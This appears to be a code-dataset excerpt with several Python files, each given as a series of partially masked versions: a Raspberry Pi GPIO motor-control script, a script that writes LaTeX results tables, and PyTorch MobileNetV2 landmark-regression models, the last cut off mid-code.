GPIO.output(Motor_B_Pin2, GPIO.HIGH)
pwm_B.start(0)
pwm_B.ChangeDutyCycle(speed)
def destroy():
motorStop()
GPIO.cleanup() # Release resource
try:
pass
except KeyboardInterrupt:
destroy()
|
normal
|
{
"blob_id": "7369d5a463b0f41c17d5648739d4730256e611f9",
"index": 9612,
"step-1": "<mask token>\n\n\ndef setup():\n global pwm_A, pwm_B\n GPIO.setwarnings(False)\n GPIO.setmode(GPIO.BOARD)\n GPIO.setup(Motor_B_EN, GPIO.OUT)\n GPIO.setup(Motor_B_Pin1, GPIO.OUT)\n GPIO.setup(Motor_B_Pin2, GPIO.OUT)\n pwm_B = GPIO.PWM(Motor_B_EN, 1000)\n\n\ndef motorStop():\n GPIO.output(Motor_B_Pin1, GPIO.LOW)\n GPIO.output(Motor_B_Pin2, GPIO.LOW)\n GPIO.output(Motor_B_EN, GPIO.LOW)\n\n\ndef motorStart(status, direction, speed):\n global pwm_B\n if status == 0:\n motorStop()\n elif direction == Dir_forward:\n GPIO.output(Motor_B_Pin1, GPIO.HIGH)\n GPIO.output(Motor_B_Pin2, GPIO.LOW)\n pwm_B.start(100)\n pwm_B.ChangeDutyCycle(speed)\n elif direction == Dir_backward:\n GPIO.output(Motor_B_Pin1, GPIO.LOW)\n GPIO.output(Motor_B_Pin2, GPIO.HIGH)\n pwm_B.start(0)\n pwm_B.ChangeDutyCycle(speed)\n\n\ndef destroy():\n motorStop()\n GPIO.cleanup()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef setup():\n global pwm_A, pwm_B\n GPIO.setwarnings(False)\n GPIO.setmode(GPIO.BOARD)\n GPIO.setup(Motor_B_EN, GPIO.OUT)\n GPIO.setup(Motor_B_Pin1, GPIO.OUT)\n GPIO.setup(Motor_B_Pin2, GPIO.OUT)\n pwm_B = GPIO.PWM(Motor_B_EN, 1000)\n\n\ndef motorStop():\n GPIO.output(Motor_B_Pin1, GPIO.LOW)\n GPIO.output(Motor_B_Pin2, GPIO.LOW)\n GPIO.output(Motor_B_EN, GPIO.LOW)\n\n\ndef motorStart(status, direction, speed):\n global pwm_B\n if status == 0:\n motorStop()\n elif direction == Dir_forward:\n GPIO.output(Motor_B_Pin1, GPIO.HIGH)\n GPIO.output(Motor_B_Pin2, GPIO.LOW)\n pwm_B.start(100)\n pwm_B.ChangeDutyCycle(speed)\n elif direction == Dir_backward:\n GPIO.output(Motor_B_Pin1, GPIO.LOW)\n GPIO.output(Motor_B_Pin2, GPIO.HIGH)\n pwm_B.start(0)\n pwm_B.ChangeDutyCycle(speed)\n\n\ndef destroy():\n motorStop()\n GPIO.cleanup()\n\n\ntry:\n pass\nexcept KeyboardInterrupt:\n destroy()\n",
"step-3": "<mask token>\nMotor_B_EN = 11\nMotor_B_Pin1 = 13\nMotor_B_Pin2 = 12\nDir_forward = 0\nDir_backward = 1\npwm_B = 0\n\n\ndef setup():\n global pwm_A, pwm_B\n GPIO.setwarnings(False)\n GPIO.setmode(GPIO.BOARD)\n GPIO.setup(Motor_B_EN, GPIO.OUT)\n GPIO.setup(Motor_B_Pin1, GPIO.OUT)\n GPIO.setup(Motor_B_Pin2, GPIO.OUT)\n pwm_B = GPIO.PWM(Motor_B_EN, 1000)\n\n\ndef motorStop():\n GPIO.output(Motor_B_Pin1, GPIO.LOW)\n GPIO.output(Motor_B_Pin2, GPIO.LOW)\n GPIO.output(Motor_B_EN, GPIO.LOW)\n\n\ndef motorStart(status, direction, speed):\n global pwm_B\n if status == 0:\n motorStop()\n elif direction == Dir_forward:\n GPIO.output(Motor_B_Pin1, GPIO.HIGH)\n GPIO.output(Motor_B_Pin2, GPIO.LOW)\n pwm_B.start(100)\n pwm_B.ChangeDutyCycle(speed)\n elif direction == Dir_backward:\n GPIO.output(Motor_B_Pin1, GPIO.LOW)\n GPIO.output(Motor_B_Pin2, GPIO.HIGH)\n pwm_B.start(0)\n pwm_B.ChangeDutyCycle(speed)\n\n\ndef destroy():\n motorStop()\n GPIO.cleanup()\n\n\ntry:\n pass\nexcept KeyboardInterrupt:\n destroy()\n",
"step-4": "import RPi.GPIO as GPIO\nimport time\nMotor_B_EN = 11\nMotor_B_Pin1 = 13\nMotor_B_Pin2 = 12\nDir_forward = 0\nDir_backward = 1\npwm_B = 0\n\n\ndef setup():\n global pwm_A, pwm_B\n GPIO.setwarnings(False)\n GPIO.setmode(GPIO.BOARD)\n GPIO.setup(Motor_B_EN, GPIO.OUT)\n GPIO.setup(Motor_B_Pin1, GPIO.OUT)\n GPIO.setup(Motor_B_Pin2, GPIO.OUT)\n pwm_B = GPIO.PWM(Motor_B_EN, 1000)\n\n\ndef motorStop():\n GPIO.output(Motor_B_Pin1, GPIO.LOW)\n GPIO.output(Motor_B_Pin2, GPIO.LOW)\n GPIO.output(Motor_B_EN, GPIO.LOW)\n\n\ndef motorStart(status, direction, speed):\n global pwm_B\n if status == 0:\n motorStop()\n elif direction == Dir_forward:\n GPIO.output(Motor_B_Pin1, GPIO.HIGH)\n GPIO.output(Motor_B_Pin2, GPIO.LOW)\n pwm_B.start(100)\n pwm_B.ChangeDutyCycle(speed)\n elif direction == Dir_backward:\n GPIO.output(Motor_B_Pin1, GPIO.LOW)\n GPIO.output(Motor_B_Pin2, GPIO.HIGH)\n pwm_B.start(0)\n pwm_B.ChangeDutyCycle(speed)\n\n\ndef destroy():\n motorStop()\n GPIO.cleanup()\n\n\ntry:\n pass\nexcept KeyboardInterrupt:\n destroy()\n",
"step-5": "#!/usr/bin/python3\n\nimport RPi.GPIO as GPIO\nimport time\n# motor_EN_A: Pin7 | motor_EN_B: Pin11\n# motor_A: Pin8,Pin10 | motor_B: Pin13,Pin12\n\n#Motor_A_EN = 7\nMotor_B_EN = 11\n\n#Motor_A_Pin1 = 8\n#Motor_A_Pin2 = 10\nMotor_B_Pin1 = 13\nMotor_B_Pin2 = 12\n\nDir_forward = 0\nDir_backward = 1\n\n#pwm_A = 0\npwm_B = 0\n\ndef setup():#Motor initialization\n\tglobal pwm_A, pwm_B\n\tGPIO.setwarnings(False)\n\tGPIO.setmode(GPIO.BOARD)\n\t#GPIO.setup(Motor_A_EN, GPIO.OUT)\n\tGPIO.setup(Motor_B_EN, GPIO.OUT)\n\t#GPIO.setup(Motor_A_Pin1, GPIO.OUT)\n\t#GPIO.setup(Motor_A_Pin2, GPIO.OUT)\n\tGPIO.setup(Motor_B_Pin1, GPIO.OUT)\n\tGPIO.setup(Motor_B_Pin2, GPIO.OUT)\n\t#pwm_A = GPIO.PWM(Motor_A_EN, 1000)\n\tpwm_B = GPIO.PWM(Motor_B_EN, 1000)\n\ndef motorStop():#Motor stops\n\t#GPIO.output(Motor_A_Pin1, GPIO.LOW)\n\t#GPIO.output(Motor_A_Pin2, GPIO.LOW)\n\tGPIO.output(Motor_B_Pin1, GPIO.LOW)\n\tGPIO.output(Motor_B_Pin2, GPIO.LOW)\n\t#GPIO.output(Motor_A_EN, GPIO.LOW)\n\tGPIO.output(Motor_B_EN, GPIO.LOW)\n\ndef motorStart(status, direction, speed):#Motor 2 positive and negative rotation\n\tglobal pwm_B\n\tif status == 0: # stop\n\t\tmotorStop()\n\telse:\n\t\tif direction == Dir_forward:\n\t\t\tGPIO.output(Motor_B_Pin1, GPIO.HIGH)\n\t\t\tGPIO.output(Motor_B_Pin2, GPIO.LOW)\n\t\t\tpwm_B.start(100)\n\t\t\tpwm_B.ChangeDutyCycle(speed)\n\t\telif direction == Dir_backward:\n\t\t\tGPIO.output(Motor_B_Pin1, GPIO.LOW)\n\t\t\tGPIO.output(Motor_B_Pin2, GPIO.HIGH)\n\t\t\tpwm_B.start(0)\n\t\t\tpwm_B.ChangeDutyCycle(speed)\n\ndef destroy():\n\tmotorStop()\n\tGPIO.cleanup() # Release resource\n\ntry:\n\tpass\nexcept KeyboardInterrupt:\n\tdestroy()\n\n\n\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
table.write('\\begin{tabular}{|c|c|c|c|} \\hline\n')
table.write(
'Hidden Neurons & Loss & Training Acc. & Valid. Acc. \\\\ \\hline\n')
<|reserved_special_token_0|>
for h in H:
file = open('Out\\out-h' + str(h) + '.txt', 'r')
line = file.readlines()[-1]
file.close()
line = line.split(',')
loss = line[1]
acc_tr = line[2]
acc_va = line[3]
table.write(str(h) + ' & ' + loss + ' & ' + acc_tr + ' & ' + acc_va +
' \\\\\n')
table.write('\\hline\n')
table.write('\\end{tabular}')
table.close()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
table = open('Tables\\table1.txt', 'w')
table.write('\\begin{tabular}{|c|c|c|c|} \\hline\n')
table.write(
'Hidden Neurons & Loss & Training Acc. & Valid. Acc. \\\\ \\hline\n')
H = [1, 5, 10, 11, 12, 20, 40]
for h in H:
file = open('Out\\out-h' + str(h) + '.txt', 'r')
line = file.readlines()[-1]
file.close()
line = line.split(',')
loss = line[1]
acc_tr = line[2]
acc_va = line[3]
table.write(str(h) + ' & ' + loss + ' & ' + acc_tr + ' & ' + acc_va +
' \\\\\n')
table.write('\\hline\n')
table.write('\\end{tabular}')
table.close()
<|reserved_special_token_1|>
from __future__ import division
import numpy as np
table = open('Tables\\table1.txt', 'w')
table.write('\\begin{tabular}{|c|c|c|c|} \\hline\n')
table.write(
'Hidden Neurons & Loss & Training Acc. & Valid. Acc. \\\\ \\hline\n')
H = [1, 5, 10, 11, 12, 20, 40]
for h in H:
file = open('Out\\out-h' + str(h) + '.txt', 'r')
line = file.readlines()[-1]
file.close()
line = line.split(',')
loss = line[1]
acc_tr = line[2]
acc_va = line[3]
table.write(str(h) + ' & ' + loss + ' & ' + acc_tr + ' & ' + acc_va +
' \\\\\n')
table.write('\\hline\n')
table.write('\\end{tabular}')
table.close()
<|reserved_special_token_1|>
from __future__ import division
import numpy as np
table = open("Tables\\table1.txt", "w")
table.write("\\begin{tabular}{|c|c|c|c|} \\hline\n")
table.write("Hidden Neurons & Loss & Training Acc. & Valid. Acc. \\\\ \\hline\n")
H = [1,5,10,11,12,20,40]
for h in H:
file = open("Out\\out-h"+str(h)+".txt", "r")
line = file.readlines()[-1]
file.close()
line = line.split(",")
loss = line[1]
acc_tr = line[2]
acc_va = line[3]
table.write(str(h)+" & "+loss+" & "+acc_tr+" & "+acc_va+" \\\\\n")
table.write("\\hline\n")
table.write("\\end{tabular}")
table.close()
|
flexible
|
{
"blob_id": "3cace66ddf8484d285c2b2a8fabbb83778a2c4af",
"index": 4352,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ntable.write('\\\\begin{tabular}{|c|c|c|c|} \\\\hline\\n')\ntable.write(\n 'Hidden Neurons & Loss & Training Acc. & Valid. Acc. \\\\\\\\ \\\\hline\\n')\n<mask token>\nfor h in H:\n file = open('Out\\\\out-h' + str(h) + '.txt', 'r')\n line = file.readlines()[-1]\n file.close()\n line = line.split(',')\n loss = line[1]\n acc_tr = line[2]\n acc_va = line[3]\n table.write(str(h) + ' & ' + loss + ' & ' + acc_tr + ' & ' + acc_va +\n ' \\\\\\\\\\n')\ntable.write('\\\\hline\\n')\ntable.write('\\\\end{tabular}')\ntable.close()\n",
"step-3": "<mask token>\ntable = open('Tables\\\\table1.txt', 'w')\ntable.write('\\\\begin{tabular}{|c|c|c|c|} \\\\hline\\n')\ntable.write(\n 'Hidden Neurons & Loss & Training Acc. & Valid. Acc. \\\\\\\\ \\\\hline\\n')\nH = [1, 5, 10, 11, 12, 20, 40]\nfor h in H:\n file = open('Out\\\\out-h' + str(h) + '.txt', 'r')\n line = file.readlines()[-1]\n file.close()\n line = line.split(',')\n loss = line[1]\n acc_tr = line[2]\n acc_va = line[3]\n table.write(str(h) + ' & ' + loss + ' & ' + acc_tr + ' & ' + acc_va +\n ' \\\\\\\\\\n')\ntable.write('\\\\hline\\n')\ntable.write('\\\\end{tabular}')\ntable.close()\n",
"step-4": "from __future__ import division\nimport numpy as np\ntable = open('Tables\\\\table1.txt', 'w')\ntable.write('\\\\begin{tabular}{|c|c|c|c|} \\\\hline\\n')\ntable.write(\n 'Hidden Neurons & Loss & Training Acc. & Valid. Acc. \\\\\\\\ \\\\hline\\n')\nH = [1, 5, 10, 11, 12, 20, 40]\nfor h in H:\n file = open('Out\\\\out-h' + str(h) + '.txt', 'r')\n line = file.readlines()[-1]\n file.close()\n line = line.split(',')\n loss = line[1]\n acc_tr = line[2]\n acc_va = line[3]\n table.write(str(h) + ' & ' + loss + ' & ' + acc_tr + ' & ' + acc_va +\n ' \\\\\\\\\\n')\ntable.write('\\\\hline\\n')\ntable.write('\\\\end{tabular}')\ntable.close()\n",
"step-5": "from __future__ import division\nimport numpy as np\n\ntable = open(\"Tables\\\\table1.txt\", \"w\")\n\ntable.write(\"\\\\begin{tabular}{|c|c|c|c|} \\\\hline\\n\")\ntable.write(\"Hidden Neurons & Loss & Training Acc. & Valid. Acc. \\\\\\\\ \\\\hline\\n\")\n\nH = [1,5,10,11,12,20,40]\nfor h in H:\n\tfile = open(\"Out\\\\out-h\"+str(h)+\".txt\", \"r\")\n\tline = file.readlines()[-1]\n\tfile.close()\n\tline = line.split(\",\")\n\tloss = line[1]\n\tacc_tr = line[2]\n\tacc_va = line[3]\n\ttable.write(str(h)+\" & \"+loss+\" & \"+acc_tr+\" & \"+acc_va+\" \\\\\\\\\\n\")\n\ntable.write(\"\\\\hline\\n\")\ntable.write(\"\\\\end{tabular}\")\n\ntable.close()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from __future__ import division
import torch
import torch.nn as nn
import math
def conv_bn(inp, oup, stride):
return nn.Sequential(
nn.Conv2d(inp, oup, 3, stride, 1, bias=False),
nn.BatchNorm2d(oup),
nn.ReLU(inplace=True)
)
def conv_1x1_bn(inp, oup):
return nn.Sequential(
nn.Conv2d(inp, oup, 1, 1, 0, bias=False),
nn.BatchNorm2d(oup),
nn.ReLU(inplace=True)
)
class InvertedResidual(nn.Module):
def __init__(self, inp, oup, stride, expand_ratio):
super(InvertedResidual, self).__init__()
self.stride = stride
assert stride in [1, 2]
hidden_dim = round(inp * expand_ratio)
self.use_res_connect = self.stride == 1 and inp == oup
if expand_ratio == 1:
self.conv = nn.Sequential(
# dw
nn.Conv2d(hidden_dim, hidden_dim, 3, stride, 1, groups=hidden_dim, bias=False),
nn.BatchNorm2d(hidden_dim),
nn.ReLU(inplace=True),
# pw-linear
nn.Conv2d(hidden_dim, oup, 1, 1, 0, bias=False),
nn.BatchNorm2d(oup),
)
else:
self.conv = nn.Sequential(
# pw
nn.Conv2d(inp, hidden_dim, 1, 1, 0, bias=False),
nn.BatchNorm2d(hidden_dim),
nn.ReLU(inplace=True),
# dw
nn.Conv2d(hidden_dim, hidden_dim, 3, stride, 1, groups=hidden_dim, bias=False),
nn.BatchNorm2d(hidden_dim),
nn.ReLU(inplace=True),
# pw-linear
nn.Conv2d(hidden_dim, oup, 1, 1, 0, bias=False),
nn.BatchNorm2d(oup),
)
def forward(self, x):
if self.use_res_connect:
return x + self.conv(x)
else:
return self.conv(x)
class SmallMobileNetV2(nn.Module):
def __init__(self, widen_factor=1.0, num_classes=1000): #, input_size=224
super(SmallMobileNetV2, self).__init__()
block = InvertedResidual
input_channel = 8
last_channel = 64
interverted_residual_setting = [
# t, c, n, s
[1, 8, 1, 1],
[6, 12, 2, 2],
[6, 16, 2, 2],
[6, 24, 3, 2],
[6, 32, 3, 2],
[6, 48, 3, 2],
[6, 64, 2, 2],
[6, 80, 1, 1],
]
# building first layer
# assert input_size % 32 == 0
input_channel = int(input_channel * widen_factor)
self.last_channel = int(last_channel * widen_factor) if widen_factor > 1.0 else last_channel
self.features = [conv_bn(3, input_channel, 2)]
# building inverted residual blocks
for t, c, n, s in interverted_residual_setting:
output_channel = int(c * widen_factor)
for i in range(n):
if i == 0:
self.features.append(block(input_channel, output_channel, s, expand_ratio=t))
else:
self.features.append(block(input_channel, output_channel, 1, expand_ratio=t))
input_channel = output_channel
# building last several layers
self.features.append(conv_1x1_bn(input_channel, self.last_channel))
# make it nn.Sequential
self.features = nn.Sequential(*self.features)
# building pts net
self.pts_net = nn.Sequential(
nn.Linear(4*self.last_channel, 256),
nn.PReLU(),
nn.Linear(256, 256),
nn.PReLU(),
nn.Linear(256, num_classes)
)
self._initialize_weights()
def forward(self, x):
x = self.features(x)
x = x.view(x.size(0), -1)
pts = self.pts_net(x)
return pts
def _initialize_weights(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
if m.bias is not None:
m.bias.data.zero_()
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
elif isinstance(m, nn.Linear):
n = m.weight.size(1)
m.weight.data.normal_(0, 0.01)
m.bias.data.zero_()
class SmallMobileNetV2Part(nn.Module):
def __init__(self, widen_factor=1.0, num_classes=68*2): #, input_size=224
super(SmallMobileNetV2Part, self).__init__()
self.block = InvertedResidual
self.input_channel = 8
self.last_channel = 64
self.interverted_residual_setting = [
# t, c, n, s
[1, 8, 1, 1],
[6, 12, 2, 2],
[6, 16, 2, 2],
[6, 24, 3, 2],
[6, 32, 3, 2],
[6, 48, 3, 2],
[6, 64, 2, 2],
[6, 80, 1, 1],
]
if num_classes==68*2:
part_dim = [22, 22, 18, 40]
elif num_classes==98*2:
part_dim = [36, 36, 18, 40]
elif num_classes==106*2:
part_dim = [38, 38, 30, 40]
# building first layer
# assert input_size % 32 == 0
# Spatial transformer localization-network
self.left_eye_net = self.make_backbone(widen_factor)
self.right_eye_net = self.make_backbone(widen_factor)
self.nose_net = self.make_backbone(widen_factor)
self.mouth_net = self.make_backbone(widen_factor)
# Regressor for the 3 * 2 affine matrix
self.left_eye_loc = self.make_pts_fc(part_dim[0])
self.right_eye_loc = self.make_pts_fc(part_dim[1])
self.nose_loc = self.make_pts_fc(part_dim[2])
self.mouth_loc = self.make_pts_fc(part_dim[3])
self._initialize_weights()
def make_backbone(self, widen_factor):
# building first layer
# assert input_size % 32 == 0
input_channel = int(self.input_channel * widen_factor)
last_channel = int(self.last_channel * widen_factor) if widen_factor > 1.0 else self.last_channel
features = [conv_bn(3, input_channel, 2)]
# building inverted residual blocks
for t, c, n, s in self.interverted_residual_setting:
output_channel = int(c * widen_factor)
for i in range(n):
if i == 0:
features.append(self.block(input_channel, output_channel, s, expand_ratio=t))
else:
features.append(self.block(input_channel, output_channel, 1, expand_ratio=t))
input_channel = output_channel
# building last several layers
features.append(conv_1x1_bn(input_channel, last_channel))
# make it nn.Sequential
return nn.Sequential(*features)
def make_pts_fc(self,num_classes):
#pdb.set_trace()
pts_net = nn.Sequential(
nn.Linear(self.last_channel, 64),
nn.PReLU(),
nn.Linear(64, 64),
nn.PReLU(),
nn.Linear(64, num_classes)
)
return pts_net
def forward(self, x):
xs_1 = self.left_eye_net(x[0])
xs_1 = torch.flatten(xs_1, 1)
#pdb.set_trace()
out_1 = self.left_eye_loc(xs_1)
xs_2 = self.right_eye_net(x[1])
xs_2 = torch.flatten(xs_2, 1)
out_2 = self.right_eye_loc(xs_2)
xs_3 = self.nose_net(x[2])
xs_3 = torch.flatten(xs_3, 1)
out_3 = self.nose_loc(xs_3)
xs_4 = self.mouth_net(x[3])
xs_4 = torch.flatten(xs_4, 1)
out_4 = self.mouth_loc(xs_4)
return [out_1, out_2, out_3, out_4]
def _initialize_weights(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
if m.bias is not None:
m.bias.data.zero_()
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
elif isinstance(m, nn.Linear):
n = m.weight.size(1)
m.weight.data.normal_(0, 0.01)
m.bias.data.zero_()
|
normal
|
{
"blob_id": "be1638638c70cf761bf5d2f0eb474b44684dfa47",
"index": 4657,
"step-1": "<mask token>\n\n\nclass SmallMobileNetV2(nn.Module):\n <mask token>\n <mask token>\n <mask token>\n\n\nclass SmallMobileNetV2Part(nn.Module):\n\n def __init__(self, widen_factor=1.0, num_classes=68 * 2):\n super(SmallMobileNetV2Part, self).__init__()\n self.block = InvertedResidual\n self.input_channel = 8\n self.last_channel = 64\n self.interverted_residual_setting = [[1, 8, 1, 1], [6, 12, 2, 2], [\n 6, 16, 2, 2], [6, 24, 3, 2], [6, 32, 3, 2], [6, 48, 3, 2], [6, \n 64, 2, 2], [6, 80, 1, 1]]\n if num_classes == 68 * 2:\n part_dim = [22, 22, 18, 40]\n elif num_classes == 98 * 2:\n part_dim = [36, 36, 18, 40]\n elif num_classes == 106 * 2:\n part_dim = [38, 38, 30, 40]\n self.left_eye_net = self.make_backbone(widen_factor)\n self.right_eye_net = self.make_backbone(widen_factor)\n self.nose_net = self.make_backbone(widen_factor)\n self.mouth_net = self.make_backbone(widen_factor)\n self.left_eye_loc = self.make_pts_fc(part_dim[0])\n self.right_eye_loc = self.make_pts_fc(part_dim[1])\n self.nose_loc = self.make_pts_fc(part_dim[2])\n self.mouth_loc = self.make_pts_fc(part_dim[3])\n self._initialize_weights()\n\n def make_backbone(self, widen_factor):\n input_channel = int(self.input_channel * widen_factor)\n last_channel = int(self.last_channel * widen_factor\n ) if widen_factor > 1.0 else self.last_channel\n features = [conv_bn(3, input_channel, 2)]\n for t, c, n, s in self.interverted_residual_setting:\n output_channel = int(c * widen_factor)\n for i in range(n):\n if i == 0:\n features.append(self.block(input_channel,\n output_channel, s, expand_ratio=t))\n else:\n features.append(self.block(input_channel,\n output_channel, 1, expand_ratio=t))\n input_channel = output_channel\n features.append(conv_1x1_bn(input_channel, last_channel))\n return nn.Sequential(*features)\n\n def make_pts_fc(self, num_classes):\n pts_net = nn.Sequential(nn.Linear(self.last_channel, 64), nn.PReLU(\n ), nn.Linear(64, 64), nn.PReLU(), nn.Linear(64, num_classes))\n return pts_net\n\n def forward(self, x):\n xs_1 = self.left_eye_net(x[0])\n xs_1 = torch.flatten(xs_1, 1)\n out_1 = self.left_eye_loc(xs_1)\n xs_2 = self.right_eye_net(x[1])\n xs_2 = torch.flatten(xs_2, 1)\n out_2 = self.right_eye_loc(xs_2)\n xs_3 = self.nose_net(x[2])\n xs_3 = torch.flatten(xs_3, 1)\n out_3 = self.nose_loc(xs_3)\n xs_4 = self.mouth_net(x[3])\n xs_4 = torch.flatten(xs_4, 1)\n out_4 = self.mouth_loc(xs_4)\n return [out_1, out_2, out_3, out_4]\n\n def _initialize_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(0, math.sqrt(2.0 / n))\n if m.bias is not None:\n m.bias.data.zero_()\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n elif isinstance(m, nn.Linear):\n n = m.weight.size(1)\n m.weight.data.normal_(0, 0.01)\n m.bias.data.zero_()\n",
"step-2": "<mask token>\n\n\nclass InvertedResidual(nn.Module):\n <mask token>\n <mask token>\n\n\nclass SmallMobileNetV2(nn.Module):\n\n def __init__(self, widen_factor=1.0, num_classes=1000):\n super(SmallMobileNetV2, self).__init__()\n block = InvertedResidual\n input_channel = 8\n last_channel = 64\n interverted_residual_setting = [[1, 8, 1, 1], [6, 12, 2, 2], [6, 16,\n 2, 2], [6, 24, 3, 2], [6, 32, 3, 2], [6, 48, 3, 2], [6, 64, 2, \n 2], [6, 80, 1, 1]]\n input_channel = int(input_channel * widen_factor)\n self.last_channel = int(last_channel * widen_factor\n ) if widen_factor > 1.0 else last_channel\n self.features = [conv_bn(3, input_channel, 2)]\n for t, c, n, s in interverted_residual_setting:\n output_channel = int(c * widen_factor)\n for i in range(n):\n if i == 0:\n self.features.append(block(input_channel,\n output_channel, s, expand_ratio=t))\n else:\n self.features.append(block(input_channel,\n output_channel, 1, expand_ratio=t))\n input_channel = output_channel\n self.features.append(conv_1x1_bn(input_channel, self.last_channel))\n self.features = nn.Sequential(*self.features)\n self.pts_net = nn.Sequential(nn.Linear(4 * self.last_channel, 256),\n nn.PReLU(), nn.Linear(256, 256), nn.PReLU(), nn.Linear(256,\n num_classes))\n self._initialize_weights()\n\n def forward(self, x):\n x = self.features(x)\n x = x.view(x.size(0), -1)\n pts = self.pts_net(x)\n return pts\n\n def _initialize_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(0, math.sqrt(2.0 / n))\n if m.bias is not None:\n m.bias.data.zero_()\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n elif isinstance(m, nn.Linear):\n n = m.weight.size(1)\n m.weight.data.normal_(0, 0.01)\n m.bias.data.zero_()\n\n\nclass SmallMobileNetV2Part(nn.Module):\n\n def __init__(self, widen_factor=1.0, num_classes=68 * 2):\n super(SmallMobileNetV2Part, self).__init__()\n self.block = InvertedResidual\n self.input_channel = 8\n self.last_channel = 64\n self.interverted_residual_setting = [[1, 8, 1, 1], [6, 12, 2, 2], [\n 6, 16, 2, 2], [6, 24, 3, 2], [6, 32, 3, 2], [6, 48, 3, 2], [6, \n 64, 2, 2], [6, 80, 1, 1]]\n if num_classes == 68 * 2:\n part_dim = [22, 22, 18, 40]\n elif num_classes == 98 * 2:\n part_dim = [36, 36, 18, 40]\n elif num_classes == 106 * 2:\n part_dim = [38, 38, 30, 40]\n self.left_eye_net = self.make_backbone(widen_factor)\n self.right_eye_net = self.make_backbone(widen_factor)\n self.nose_net = self.make_backbone(widen_factor)\n self.mouth_net = self.make_backbone(widen_factor)\n self.left_eye_loc = self.make_pts_fc(part_dim[0])\n self.right_eye_loc = self.make_pts_fc(part_dim[1])\n self.nose_loc = self.make_pts_fc(part_dim[2])\n self.mouth_loc = self.make_pts_fc(part_dim[3])\n self._initialize_weights()\n\n def make_backbone(self, widen_factor):\n input_channel = int(self.input_channel * widen_factor)\n last_channel = int(self.last_channel * widen_factor\n ) if widen_factor > 1.0 else self.last_channel\n features = [conv_bn(3, input_channel, 2)]\n for t, c, n, s in self.interverted_residual_setting:\n output_channel = int(c * widen_factor)\n for i in range(n):\n if i == 0:\n features.append(self.block(input_channel,\n output_channel, s, expand_ratio=t))\n else:\n features.append(self.block(input_channel,\n output_channel, 1, expand_ratio=t))\n input_channel = output_channel\n features.append(conv_1x1_bn(input_channel, last_channel))\n return nn.Sequential(*features)\n\n def make_pts_fc(self, num_classes):\n pts_net = nn.Sequential(nn.Linear(self.last_channel, 64), nn.PReLU(\n ), nn.Linear(64, 64), nn.PReLU(), nn.Linear(64, num_classes))\n return pts_net\n\n def forward(self, x):\n xs_1 = self.left_eye_net(x[0])\n xs_1 = torch.flatten(xs_1, 1)\n out_1 = self.left_eye_loc(xs_1)\n xs_2 = self.right_eye_net(x[1])\n xs_2 = torch.flatten(xs_2, 1)\n out_2 = self.right_eye_loc(xs_2)\n xs_3 = self.nose_net(x[2])\n xs_3 = torch.flatten(xs_3, 1)\n out_3 = self.nose_loc(xs_3)\n xs_4 = self.mouth_net(x[3])\n xs_4 = torch.flatten(xs_4, 1)\n out_4 = self.mouth_loc(xs_4)\n return [out_1, out_2, out_3, out_4]\n\n def _initialize_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(0, math.sqrt(2.0 / n))\n if m.bias is not None:\n m.bias.data.zero_()\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n elif isinstance(m, nn.Linear):\n n = m.weight.size(1)\n m.weight.data.normal_(0, 0.01)\n m.bias.data.zero_()\n",
"step-3": "<mask token>\n\n\nclass InvertedResidual(nn.Module):\n\n def __init__(self, inp, oup, stride, expand_ratio):\n super(InvertedResidual, self).__init__()\n self.stride = stride\n assert stride in [1, 2]\n hidden_dim = round(inp * expand_ratio)\n self.use_res_connect = self.stride == 1 and inp == oup\n if expand_ratio == 1:\n self.conv = nn.Sequential(nn.Conv2d(hidden_dim, hidden_dim, 3,\n stride, 1, groups=hidden_dim, bias=False), nn.BatchNorm2d(\n hidden_dim), nn.ReLU(inplace=True), nn.Conv2d(hidden_dim,\n oup, 1, 1, 0, bias=False), nn.BatchNorm2d(oup))\n else:\n self.conv = nn.Sequential(nn.Conv2d(inp, hidden_dim, 1, 1, 0,\n bias=False), nn.BatchNorm2d(hidden_dim), nn.ReLU(inplace=\n True), nn.Conv2d(hidden_dim, hidden_dim, 3, stride, 1,\n groups=hidden_dim, bias=False), nn.BatchNorm2d(hidden_dim),\n nn.ReLU(inplace=True), nn.Conv2d(hidden_dim, oup, 1, 1, 0,\n bias=False), nn.BatchNorm2d(oup))\n\n def forward(self, x):\n if self.use_res_connect:\n return x + self.conv(x)\n else:\n return self.conv(x)\n\n\nclass SmallMobileNetV2(nn.Module):\n\n def __init__(self, widen_factor=1.0, num_classes=1000):\n super(SmallMobileNetV2, self).__init__()\n block = InvertedResidual\n input_channel = 8\n last_channel = 64\n interverted_residual_setting = [[1, 8, 1, 1], [6, 12, 2, 2], [6, 16,\n 2, 2], [6, 24, 3, 2], [6, 32, 3, 2], [6, 48, 3, 2], [6, 64, 2, \n 2], [6, 80, 1, 1]]\n input_channel = int(input_channel * widen_factor)\n self.last_channel = int(last_channel * widen_factor\n ) if widen_factor > 1.0 else last_channel\n self.features = [conv_bn(3, input_channel, 2)]\n for t, c, 